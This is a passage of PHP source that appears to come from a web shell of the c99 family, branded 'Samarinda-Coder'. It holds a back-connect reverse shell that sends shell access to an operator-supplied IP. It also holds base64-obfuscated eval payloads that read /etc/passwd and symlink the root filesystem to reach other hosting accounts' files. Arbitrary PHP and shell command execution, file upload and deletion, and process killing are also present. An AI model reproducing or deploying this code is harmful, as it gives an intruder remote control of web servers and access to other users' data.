  2312. if ($k > count($head)) {$k = count($head)-1;}
  2313. for($i=0;$i<count($head);$i++) {
  2314. if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
  2315. }
  2316. $prcs = array();
  2317. unset($stack[0]);
  2318. foreach ($stack as $line) {
  2319. if (!empty($line)) {
  2320. $line = explode(" ",$line);
  2321. $line[4] = str_replace(".","",$line[4]);
  2322. $line[4] = intval($line[4]) * 1024;
  2323. unset($line[5]);
  2324. $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."\"><u>KILL</u></a>";
  2325. $prcs[] = $line;
  2326. }
  2327. }
  2328. }
  2329. $head[$k] = "<b>".$head[$k]."</b>".$y;
  2330. $v = $processes_sort[0];
  2331. usort($prcs,"tabsort");
  2332. if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); }
  2333. $tab = array();
  2334. $tab[] = $head;
  2335. $tab = array_merge($tab,$prcs);
  2336. echo "<table class=\"explorer\">\n";
  2337. foreach($tab as $i=>$k) {
  2338. echo "\t<tr>";
  2339. foreach($k as $j=>$v) {
  2340. if (is_windows() and $i > 0 and $j == 4) { $v = view_size($v); }
  2341. echo "<td>".$v."</td>";
  2342. }
  2343. echo "</tr>\n";
  2344. }
  2345. echo "</table>\n";
  2346. }
  2347. }
  2348.  
  2349. if ($act == "bc") {
  2350. echo "<br><b>Backconnect Tools<br>
  2351. <hr>
  2352. <form method='POST' action=''><br>
  2353. Your IP & Port:<br>
  2354. <input type='text' name='ipim' size='15' value=''>
  2355. <input type='text' name='portum' size='5' value='21'><br><br>
  2356. <input type='submit' value='Connect'><br><br>
  2357. <hr>
  2358. </form>";
  2359.  
  2360. $ipim=$_POST['ipim'];
  2361. $portum=$_POST['portum'];
  2362. if ($ipim <> "")
  2363. {
  2364. $mucx=fsockopen($ipim , $portum , $errno, $errstr );
  2365. if (!$mucx){
  2366. $result = "Error: didnt connect !!!";
  2367. }
  2368. else {
  2369.  
  2370. $zamazing0="\n";
  2371.  
  2372. fputs ($mucx ,"\nSamarinda-Coder BackConnect\n\n");
  2373. fputs($mucx , system("uname -a") .$zamazing0 );
  2374. fputs($mucx , system("pwd") .$zamazing0 );
  2375. fputs($mucx , system("id") .$zamazing0.$zamazing0 );
  2376. while(!feof($mucx)){
  2377. fputs ($mucx);
  2378. $one="[$";
  2379. $two="]";
  2380. $result= fgets ($mucx, 8192);
  2381. $message=`$result`;
  2382. fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
  2383. }
  2384. fclose ($mucx);
  2385. }
  2386. }
  2387. }
  2388.  
  2389. if ($act == "jump") {
  2390. $ngipmuj = base64_decode("YmFyX2hlYWRlcigiLjogSnVtcGluZyA6LiIpOw0KCSgkc20gPSBpbmlfZ2V0KCdzYWZlX21vZGUnKSA9PSAwKSA/ICRzbSA9ICdvZmYnOiBkaWUoJzxmb250IHNpemU9IjQiIGNvbG9yPSIjMDAwMDAwIiBmYWNlPSJDYWxpYnJpIj48Yj5FcnJvcjogU2FmZV9tb2RlID0gT248L2I+PC9mb250PicpOw0Kc2V0X3RpbWVfbGltaXQoMCk7DQpAJHBhc3N3ZCA9IGZvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKTsNCmlmICghJHBhc3N3ZCkgeyBkaWUoJzxmb250IHNpemU9IjQiIGNvbG9yPSIjMDAwMDAwIiBmYWNlPSJDYWxpYnJpIj48Yj5bLV0gRXJyb3IgOiBDb3VkbmB0IFJlYWQgL2V0Yy9wYXNzd2Q8L2I+PC9mb250PicpOyB9DQokcHViID0gYXJyYXkoKTsNCiR1c2VycyA9IGFycmF5KCk7DQokY29uZiA9IGFycmF5KCk7DQokaSA9IDA7DQp3aGlsZSghZmVvZigkcGFzc3dkKSkNCnsNCiRzdHIgPSBmZ2V0cygkcGFzc3dkKTsNCmlmICgkaSA+IDEwMCkNCnsNCiAgJHBvcyA9IHN0cnBvcygkc3RyLCc6Jyk7DQogICR1c2VybmFtZSA9IHN1YnN0cigkc3RyLDAsJHBvcyk7DQogICRkaXJ6ID0gJy9ob21lLycuJHVzZXJuYW1lLicvcHVibGljX2h0bWwvJzsNCiAgaWYgKCgkdXNlcm5hbWUgIT0gJycpKQ0KICB7DQogICBpZiAoaXNfcmVhZGFibGUoJGRpcnopKQ0KICAgew0KICAgIGFycmF5X3B1c2goJHVzZXJzLCR1c2VybmFtZSk7DQogICAgYXJyYXlfcHVzaCgkcHViLCRkaXJ6KTsNCiAgIH0NCiAgfQ0KICAgfQ0KJGkrKzsNCn0NCmVjaG8gIlxuIDxmb250IHNpemU9JzMnIGNvbG9yPScjMDA4MDgwJyBmYWNlPSdDYWxpYnJpJz48YnI+Wy1dPT09PT09PT09PT09PT09PT09WyBTVEFSVCBKdW1waW5nIEdhbiBdPT09PT09PT09PT09PT09PT09Wy1dICA8YnI+PC9mb250PlxuIjsNCmZvcmVhY2ggKCR1c2VycyBhcyAkdXNlcikNCnsNCmVjaG8gIjxmb250IHNpemU9JzMnIGNvbG9yPScjZWUwODA4JyBmYWNlPSdDYWxpYnJpJz4gWytdIC9ob21lLyR1c2VyL3B1YmxpY19odG1sLzwvZm9udD48YnIvPiI7DQp9DQplY2hvICJcbiA8Zm9udCBzaXplPSczJyBjb2xvcj0nIzAwODA4MCcgZmFjZT0nQ2FsaWJyaSc+PGJyPlstXT09PT09PT09PT09PT09PT09PVsgRklOSVNIIEdBTiBdPT09PT09PT09PT09PT09PT09Wy1dIDxicj48L2ZvbnQ+XG4iOw0KZWNobyAiXG4gPGZvbnQgc2l6ZT0nMicgY29sb3I9JyM4MDAwMDAnIGZhY2U9J0NhbGlicmknPkp1bXBpbmcgU2Nhbm5lciBTYW1hcmluZGEgQ29kZXIgU2VsZXNhaSE8L2ZvbnQ+XG4iOw==");
  2391. eval ($ngipmuj);
  2392. }
  2393.  
  2394. if ($act == "sym") {
  2395. $knilmys = base64_decode("QHNldF90aW1lX2xpbWl0KDApOw0KJGhuMSA9ICdodHRwOi8vJy4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXTsNCiRobjIgPWV4cGxvZGUoJy8nLCRobjEgKTsNCiRobjEgPXN0cl9yZXBsYWNlKCRobjJbY291bnQoJGhuMiktMV0sJycsJGhuMSApOw0KDQpAbWtkaXIoJ3N5bScsMDc3Nyk7DQokaG4xICA9ICJPcHRpb25zIGFsbCBcbiBEaXJlY3RvcnlJbmRleCBTdXguaHRtbCBcbiBBZGRUeXBlIHRleHQvcGxhaW4gLnBocCBcbiBBZGRIYW5kbGVyIHNlcnZlci1wYXJzZWQgLnBocCBcbiAgQWRkVHlwZSB0ZXh0L3BsYWluIC5odG1sIFxuIEFkZEhhbmRsZXIgdHh0IC5odG1sIFxuIFJlcXVpcmUgTm9uZSBcbiBTYXRpc2Z5IEFueSI7DQokaG4yID1AZm9wZW4gKCdzeW0vLmh0YWNjZXNzJywndycpOw0KZndyaXRlKCRobjIgLCRobjEpOw0KQHN5bWxpbmsoJy8nLCdzeW0vcm9vdCcpOw0KaWYoaXNzZXQoJF9SRVFVRVNUWydhY3QnXSkpDQp7DQpzd2l0Y2ggKCRfUkVRVUVTVFsnYWN0J10pDQp7DQpjYXNlICdzeW0nOg0KJGhuNCA9IEBmaWxlKCcvZXRjL25hbWVkLmNvbmYnKTsNCmlmKCEkaG40KQ0Kew0KZGllICgiIGNhbid0IHJlYWQgL2V0Yy9uYW1lZC5jb25mIik7DQp9DQplbHNlDQp7DQplY2hvICI8ZGl2IGNsYXNzPSd0bXAnPjx0YWJsZSBhbGlnbj0nY2VudGVyJyB3aWR0aD0nNDAlJz48dGQ+RG9tYWluczwvdGQ+PHRkPlVzZXJzPC90ZD48dGQ+c3ltbGluayA8L3RkPiI7DQpmb3JlYWNoKCRobjQgYXMgJGhuNSl7DQppZihlcmVnaSgnem9uZScsJGhuNSkpew0KcHJlZ19tYXRjaF9hbGwoJyN6b25lICIoLiopIiMnLCRobjUsJGhuNik7DQpmbHVzaCgpOw0KaWYoc3RybGVuKHRyaW0oJGhuNlsxXVswXSkpID4yKXsNCiRobjcgPSBwb3NpeF9nZXRwd3VpZChAZmlsZW93bmVyKCcvZXRjL3ZhbGlhc2VzLycuJGhuNlsxXVswXSkpOw0KJGhuOCA9ICRobjdbJ25hbWUnXSA7DQpAc3ltbGluaygnLycsJ3N5bS9yb290Jyk7DQokaG44ID0gJGhuNlsxXVswXTsNCiRobjkgPSAnXC5pcic7DQokaG4xMCA9ICdcLmlsJzsNCmlmIChlcmVnaSgiJGhuOSIsJGhuNlsxXVswXSkgb3IgZXJlZ2koIiRobjEwIiwkaG42WzFdWzBdKSApDQp7DQokaG44ID0gIjxkaXYgc3R5bGU9JyBjb2xvcjogI0ZGMDAwMCA7IHRleHQtc2hhZG93OiAwcHggMHB4IDFweCByZWQ7ICc+Ii4kaG42WzFdWzBdLic8L2Rpdj4nOw0KfQ0KZWNobyAiDQo8dHI+DQoNCjx0ZD4NCjxkaXYgY2xhc3M9J2RvbSc+PGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9aHR0cDovL3d3dy4iLiRobjZbMV1bMF0uJy8+Jy4kaG44LicgPC9hPiA8L2Rpdj4NCjwvdGQ+DQoNCg0KPHRkPg0KJy4kaG43WyduYW1lJ10uIg0KPC90ZD4NCg0KPHRkPg0KPGEgaHJlZj0nc3ltL3Jvb3QvaG9tZS8iLiRobjdbJ25hbWUnXS4iL3B1YmxpY19odG1sJyB0YXJnZXQ9J19ibGFuayc+aGFqYXI8L2E+DQo8L3RkPg0KDQo8L3RyPjwvZGl2PiAiOw0KZmx1c2goKTsNCn0NCn0NCn0NCn0NCn0NCn0=");
  2396. eval ($knilmys);
  2397. }
  2398. ##[ EVAL ]##
  2399. if ($act == "eval") {
  2400. if (!empty($eval)) {
  2401. bar_header("Result of execution this PHP-code:");
  2402. $tmp = @ob_get_contents();
  2403. $olddir = realpath(".");
  2404. @chdir($d);
  2405. if ($tmp) {
  2406. @ob_clean();
  2407. eval($eval);
  2408. $ret = @ob_get_contents();
  2409. $ret = convert_cyr_string($ret,"d","w");
  2410. @ob_clean();
  2411. echo $tmp;
  2412. if (@$eval_txt) {
  2413. $rows = count(explode("\r\n",$ret))+1;
  2414. if ($rows < 10) {$rows = 10;}
  2415. echo "<br><textarea cols=\"125\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  2416. }
  2417. else {echo $ret."<br>";}
  2418. }
  2419. else {
  2420. if ($eval_txt) {
  2421. echo "<br><textarea cols=\"125\" rows=\"10\" readonly>";
  2422. eval($eval);
  2423. echo "</textarea>";
  2424. }
  2425. else {echo $ret;}
  2426. }
  2427. @chdir($olddir);
  2428. }
  2429. else {
  2430. bar_header(".: PHP-code Execution :.");
  2431. if (empty($eval_txt)) { $eval_txt = TRUE; }
  2432. }
  2433. ?>
  2434. <form name="f_eval" action="<?php echo $surl; ?>" method="post">
  2435. <input type="hidden" name="act" value="eval">
  2436. <textarea name="eval" cols="125" rows="10">
  2437. <?php
  2438. echo htmlspecialchars(@$eval);
  2439. ?>
  2440. </textarea>
  2441. <input type="hidden" name="d" value="<?php echo $dispd; ?>"><br>
  2442. <input type="submit" value="Execute"> Display in text-area <input type="checkbox" name="eval_txt" value="1"<?php if (@$eval_txt) { echo " checked"; } ?>>
  2443. </form>
  2444. <?php
  2445. }
  2446. ##[ UPDATE ]##
  2447. if ($act == "update") {
  2448. $ret = alecs_getupdate(@$confirmupdate);
  2449. echo "<b>$ret</b>";
  2450. if (stristr($ret,"new version")) {
  2451. echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
  2452. }
  2453. }
  2454. if ($act == "phpinfo") { @ob_clean(); phpinfo(); alecsexit(); }
  2455. if ($act == "tools") { alecs_tools(); }
  2456. if ($act == "about") { alecs_about(); }
  2457. }
  2458. ##[ END OF ACTIONS ]##
  2459. ######################
  2460. ##[ COMMANDS PANEL ]##
  2461. ######################
  2462. ?>
  2463. </div>
  2464. <!-- End of Main Info -->
  2465. <!-- Commands Panel -->
  2466. <div id="main">
  2467. <div class="bartitle"><b>.: COMMANDS PANEL :.</b></div>
  2468. <table id="mainpanel">
  2469. <tr><th colspan="2">Command:</th>
  2470. <td>
  2471. <form name="f_cmd" method="post">
  2472. <input type="hidden" name="act" value="cmd">
  2473. <input type="hidden" name="d" value="<?php echo $dispd; ?>">
  2474. <input type="hidden" name="cmd_txt" value="1">
  2475. <input type="text" name="cmd" size="100" value="<?php echo @htmlspecialchars($cmd); ?>">
  2476. <input type="submit" name="submit" value="Execute">
  2477. </form>
  2478. </td></tr>
  2479. <tr><th colspan="2">Quick Commands:</th>
  2480. <td>
  2481. <form name="f_qcmd" method="post">
  2482. <input type="hidden" name="act" value="cmd">
  2483. <input type="hidden" name="d" value="<?php echo $dispd; ?>">
  2484. <input type="hidden" name="cmd_txt" value="1">
  2485. <select name="cmd">
  2486. <?php
  2487. foreach ($cmdaliases as $als) {
  2488. echo "\t\t\t";
  2489. echo '<option value="'.htmlspecialchars($als[1]).'">'.htmlspecialchars($als[0]).'</option>';
  2490. echo "\n";
  2491. }
  2492. ?>
  2493. </select>
  2494. <input type="submit" name="submit" value="Execute">
  2495. </form>
  2496. </td></tr>
  2497. <tr><th colspan="2" rowspan="2">PHP Filesystem:</th>
  2498. <td>
  2499. <script language="javascript">
  2500. function set_arg(txt1,txt2) {
  2501. document.forms.fphpfsys.phpfsysfunc.value.selected = "Download";
  2502. document.forms.fphpfsys.arg1.value = txt1;
  2503. document.forms.fphpfsys.arg2.value = txt2;
  2504. }
  2505. function chg_arg(num,txt1,txt2) {
  2506. if (num==0) {
  2507. document.forms.fphpfsys.arg1.type = "hidden";
  2508. document.forms.fphpfsys.A1.type = "hidden";
  2509. }
  2510. if (num<=1) {
  2511. document.forms.fphpfsys.arg2.type = "hidden";
  2512. document.forms.fphpfsys.A2.type = "hidden";
  2513. }
  2514. if (num==2) {
  2515. document.forms.fphpfsys.A1.type = "label";
  2516. document.forms.fphpfsys.A2.type = "label";
  2517. document.forms.fphpfsys.arg1.type = "text";
  2518. document.forms.fphpfsys.arg2.type = "text";
  2519. }
  2520. document.forms.fphpfsys.A1.value = txt1 + ":";
  2521. document.forms.fphpfsys.A2.value = txt2 + ":";
  2522. }
  2523. </script>
  2524. <form name="fphpfsys" method="post">
  2525. <input type="hidden" name="act" value="phpfsys">
  2526. <input type="hidden" name="d" value="<?php echo $dispd; ?>">
  2527. <select name="phpfsysfunc">
  2528. <?php
  2529. foreach ($phpfsaliases as $als) {
  2530. if ($als[1]==@$phpfsysfunc) {
  2531. echo "\t\t<option selected value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\n";
  2532. }
  2533. else {
  2534. echo "\t\t<option value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','".@$als[4]."')\">".$als[0]."</option>\n";
  2535. }
  2536. }
  2537. ?>
  2538. </select>
  2539. <input type="label" name="A1" value="File:" size=2 disabled>
  2540. <input type=text name=arg1 size=40 value="<?php echo @htmlspecialchars($arg1); ?>">
  2541. <input type="hidden" name="A2" size=3 disabled >
  2542. <input type="hidden" name="arg2" size=40 value="<?php echo @htmlspecialchars($arg2); ?>">
  2543. <input type="submit" name="submit" value="Execute">
  2544. </form>
  2545. </td></tr>
  2546. <tr><td>
  2547. <?php
  2548. foreach ($sh_sourcez as $e => $o) {
  2549. echo "\t<input type=button value=\"$e\" onclick=\"set_arg('$o[0]','$o[1]')\">\n";
  2550. }
  2551. ?>
  2552. </td></tr>
  2553.  
  2554. <tr><th rowspan="4">Filesystem</th>
  2555. <th>Search:</th>
  2556. <td>
  2557. <form name="f_search" method="post">
  2558. <input type="hidden" name="act" value="search">
  2559. <input type="hidden" name="d" value="<?php echo $dispd; ?>">
  2560. <input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> regexp <input type=submit name=submit value="Search">
  2561. </form>
  2562. </td></tr>
  2563. <tr><th>Upload:</th>
  2564. <td>
  2565. <form name="f_upload" method="post" enctype="multipart/form-data">
  2566. <input type="hidden" name="act" value="upload">
  2567. <input type="file" name="uploadfile" size="50">
  2568. <input type="submit" name="submit" value="Upload">
  2569. <?php echo "<small>Max size: ".@ini_get("upload_max_filesize")."B | Temp dir: ".@ini_get("upload_tmp_dir")."</small>\n"; ?>
  2570. </form>
  2571. </td></tr>
  2572. <tr><th>Create:</th>
  2573. <td>
  2574. <form name="f_mkfile" method="post">
  2575. <input type="hidden" name="act" value="mkfile">
  2576. <input type="hidden" name="d" value="<?php echo $dispd; ?>">
  2577. <input type="hidden" name="ft" value="edit">
  2578. <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> <input type="checkbox" name="overwrite" value="1" checked> Overwrite <input type=submit value="Create">
  2579. </form>
  2580. </td></tr>
  2581. <tr><th>View:</th><td>
  2582. <form name="f_gofile" method="post">
  2583. <input type="hidden" name="act" value="gofile">
  2584. <input type="hidden" name="d" value="<?php echo $dispd; ?>">
  2585. <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> <input type="submit" value="View">
  2586. </form>
  2587. </td></tr>
  2588. </table>
  2589.  
  2590. <div class="bartitle footer"><?php echo html_footer(); ?></div>
  2591.  
  2592. </div>
  2593. <!-- End of Commands Panel -->
  2594. </center></body>
  2595. </html>
  2596. <?php
  2597. #################
  2598. ##[ FUNCTIONS ]##
  2599. #################
  2600. function safemode() {
  2601. if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
  2602. else { return FALSE; }
  2603. }
  2604. function getdisfunc() {
  2605. $disfunc = @ini_get("disable_functions");
  2606. if (!empty($disfunc)) {
  2607. $disfunc = str_replace(" ","",$disfunc);
  2608. $disfunc = explode(",",$disfunc);
  2609. }
  2610. else { $disfunc= array(); }
  2611. return $disfunc;
  2612. }
  2613. function enabled($func) {
  2614. if ( function_exists($func) && is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
  2615. else { return FALSE; }
  2616. }
  2617. ##[ FX29EXEC W/ STDERR ]##
  2618. function fx29exec($cmd) {
  2619. $output = "";
  2620. if ( enabled("popen") ) {
  2621. $h = popen($cmd.' 2>&1', 'r');
  2622. if ( is_resource($h) ) {
  2623. while ( !feof($h) ) { $output .= fread($h, 2096); }
  2624. pclose($h);
  2625. }
  2626. }
  2627. elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
  2628. elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
  2629. elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
  2630. elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
  2631. return $output;
  2632. }
  2633. ##[ FX29EXEC W/O STDERR ]##
  2634. function fx29exec2($cmd) {
  2635. $output = "";
  2636. if ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
  2637. elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
  2638. elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); } #Dipindahkan kesini karena menimbulkan masalah pada output control
  2639. elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
  2640. elseif ( enabled("popen") ) {
  2641. $h = popen($cmd.' 2>&1', 'r');
  2642. if ( is_resource($h) ) {
  2643. while ( !feof($h) ) { $output .= fread($h, 2096); }
  2644. pclose($h);
  2645. }
  2646. }
  2647. return $output;
  2648. }
  2649. function is_windows() { return strtolower(substr(PHP_OS,0,3)) == "win"; }
  2650. function which($pr) {
  2651. $path = fx29exec("which $pr");
  2652. if(!empty($path)) { return $path; } else { return $pr; }
  2653. }
  2654. function get_status() {
  2655. $arrfunc = array(
  2656. array("MySQL","mysql_connect"),
  2657. array("MSSQL","mssql_connect"),
  2658. array("Oracle","ocilogon"),
  2659. array("PostgreSQL","pg_connect"),
  2660. array("Curl","curl_version"),
  2661. );
  2662. $arrcmd = array(
  2663. array("Fetch","fetch --help"),
  2664. array("Wget","wget --help"),
  2665. array("Perl","perl -v"),
  2666. );
  2667. $statinfo = array();
  2668. function showstat($sup,$stat) {
  2669. if ($stat == "on") { return "$sup: <font class=on>ON</font>"; }
  2670. else { return "$sup: <font class=off>OFF</font>"; }
  2671. }
  2672. foreach ($arrfunc as $func) {
  2673. if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); }
  2674. else { $statinfo[] = showstat($func[0],"off"); }
  2675. }
  2676. $statinfo[] = (@extension_loaded('sockets')) ? showstat("Sockets","on") : showstat("Sockets","off");
  2677. foreach ($arrcmd as $cmd) {
  2678. if (fx29exec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); }
  2679. else { $statinfo[] = showstat($cmd[0],"off"); }
  2680. }
  2681. return implode(" ",$statinfo);
  2682. }
  2683. function showdisfunc() {
  2684. $disfunc = getdisfunc();
  2685. if ($disfunc = @ini_get("disable_functions")) {
  2686. return '<font class="off">'.$disfunc.'</font>';
  2687. }
  2688. else { return '<font class="on">NONE</font>'; }
  2689. }
  2690. function disp_drives($curdir,$surl) {
  2691. $letters = "";
  2692. $v = explode("\\",$curdir);
  2693. $v = $v[0];
  2694. foreach (range("A","Z") as $letter) {
  2695. $bool = $isdiskette = $letter == "A";
  2696. if (!$bool) { $bool = is_dir($letter.":\\"); }
  2697. if ($bool) {
  2698. $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
  2699. ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly!')\"":"")."> ";
  2700. if ($letter.":" != $v) { $letters .= $letter; }
  2701. else { $letters .= "<font color=#3366FF>".$letter."</font>"; }
  2702. $letters .= " </a> ";
  2703. }
  2704. }
  2705. if (!empty($letters)) { Return $letters; }
  2706. else { Return "None"; }
  2707. }
  2708. function view_size($size) {
  2709. if (!is_numeric($size)) { return FALSE; }
  2710. else {
  2711. if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  2712. elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  2713. elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  2714. else {$size = $size . " B";}
  2715. return $size;
  2716. }
  2717. }
  2718. function disp_freespace($curdrv) {
  2719. $free = @disk_free_space($curdrv);
  2720. $total = @disk_total_space($curdrv);
  2721. if ($free === FALSE) { $free = 0; }
  2722. if ($total === FALSE) { $total = 0; }
  2723. if ($free < 0) { $free = 0; }
  2724. if ($total < 0) { $total = 0; }
  2725. $used = $total-$free;
  2726. $free_percent = round(100/($total/$free),2)."%";
  2727. $free = view_size($free);
  2728. $total = view_size($total);
  2729. return "$free of $total ($free_percent)";
  2730. }
  2731.  
  2732. function fx29_buff_prepare() {
  2733. global $sess_data, $act;
  2734. foreach ($sess_data["copy"] as $k=>$v) {
  2735. $sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));
  2736. }
  2737. foreach ($sess_data["cut"] as $k=>$v) {
  2738. $sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));
  2739. }
  2740. $sess_data["copy"] = array_unique($sess_data["copy"]);
  2741. $sess_data["cut"] = array_unique($sess_data["cut"]);
  2742. sort($sess_data["copy"]);
  2743. sort($sess_data["cut"]);
  2744. if ($act != "copy") {
  2745. foreach ($sess_data["cut"] as $k=>$v) {
  2746. if ($sess_data["copy"][$k] == $v) { unset($sess_data["copy"][$k]); }
  2747. }
  2748. }
  2749. else {
  2750. foreach ($sess_data["copy"] as $k=>$v) {
  2751. if ($sess_data["cut"][$k] == $v) { unset($sess_data["cut"][$k]); }
  2752. }
  2753. }
  2754. }
  2755. function fx29_sess_put($data) {
  2756. global $sess_cookie;
  2757. global $sess_data;
  2758. fx29_buff_prepare();
  2759. $sess_data = $data;
  2760. $data = serialize($data);
  2761. setcookie($sess_cookie,$data);
  2762. }
  2763. ##[ FILESYSTEM FUNCTIONS ]##
  2764. function fs_copy_dir($d,$t) {
  2765. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  2766. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  2767. $h = opendir($d);
  2768. while (($o = readdir($h)) !== FALSE) {
  2769. if (($o != ".") and ($o != "..")) {
  2770. if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  2771. else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  2772. if (!$ret) {return $ret;}
  2773. }
  2774. }
  2775. closedir($h);
  2776. return TRUE;
  2777. }
  2778. function fs_copy_obj($d,$t) {
  2779. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  2780. $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  2781. if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  2782. if (is_dir($d)) {
  2783. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  2784. if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  2785. return fs_copy_dir($d,$t);
  2786. }
  2787. elseif (is_file($d)) { return copy($d,$t); }
  2788. else { return FALSE; }
  2789. }
  2790. function fs_move_dir($d,$t) {
  2791. $h = opendir($d);
  2792. if (!is_dir($t)) {mkdir($t);}
  2793. while (($o = readdir($h)) !== FALSE) {
  2794. if (($o != ".") and ($o != "..")) {
  2795. $ret = TRUE;
  2796. if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  2797. else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
  2798. if (!$ret) {return $ret;}
  2799. }
  2800. }
  2801. closedir($h);
  2802. return TRUE;
  2803. }
  2804. function fs_move_obj($d,$t) {
  2805. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  2806. $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  2807. if (is_dir($d)) {
  2808. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  2809. if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  2810. return fs_move_dir($d,$t);
  2811. }
  2812. elseif (is_file($d)) {
  2813. if(copy($d,$t)) {return unlink($d);}
  2814. else {unlink($t); return FALSE;}
  2815. }
  2816. else {return FALSE;}
  2817. }
  2818. function fs_rmdir($d) {
  2819. $h = opendir($d);
  2820. while (($o = readdir($h)) !== FALSE) {
  2821. if (($o != ".") and ($o != "..")) {
  2822. if (!is_dir($d.$o)) {unlink($d.$o);}
  2823. else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  2824. }
  2825. }
  2826. closedir($h);
  2827. rmdir($d);
  2828. return !is_dir($d);
  2829. }
  2830. function fs_rmobj($o) {
  2831. $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  2832. if (is_dir($o)) {
  2833. if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  2834. return fs_rmdir($o);
  2835. }
  2836. elseif (is_file($o)) { return unlink($o); }
  2837. else { return FALSE; }
  2838. }
  2839. ##[ END FILESYSTEM FUNCTIONS ]##
  2840. ##[ EXIT FUNCTIONS ]##
  2841. function alecsexit() {
  2842. global $gzipencode,$ft;
  2843.  
  2844. if ( !headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")) ) {
  2845. $v = @ob_get_contents();
  2846. @ob_end_clean();
  2847. @ob_start("ob_gzHandler");
  2848. echo $v;
  2849. @ob_end_flush();
  2850. }
  2851. exit;
  2852. }
  2853. ##[ END OF EXIT FUNCTIONS ]##
  2854. function fx29fsearch($d) {
  2855.  
  2856. global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a;
  2857. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  2858. $h = opendir($d);
  2859. while (($f = readdir($h)) !== FALSE) {
  2860. if($f != "." && $f != "..") {
  2861. $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
  2862. if (is_dir($d.$f)) {
  2863. $search_i_d++;
  2864. if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  2865. if (!is_link($d.$f)) { fx29fsearch($d.$f); }
  2866. }
  2867. else {
  2868. $search_i_f++;
  2869. if ($bool) {
  2870. if (!empty($a["text"])) {
  2871. $r = @file_get_contents($d.$f);
  2872. if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  2873. if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  2874. if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
  2875. else {$bool = strpos(" ".$r,$a["text"],1);}
  2876. if ($a["text_not"]) {$bool = !$bool;}
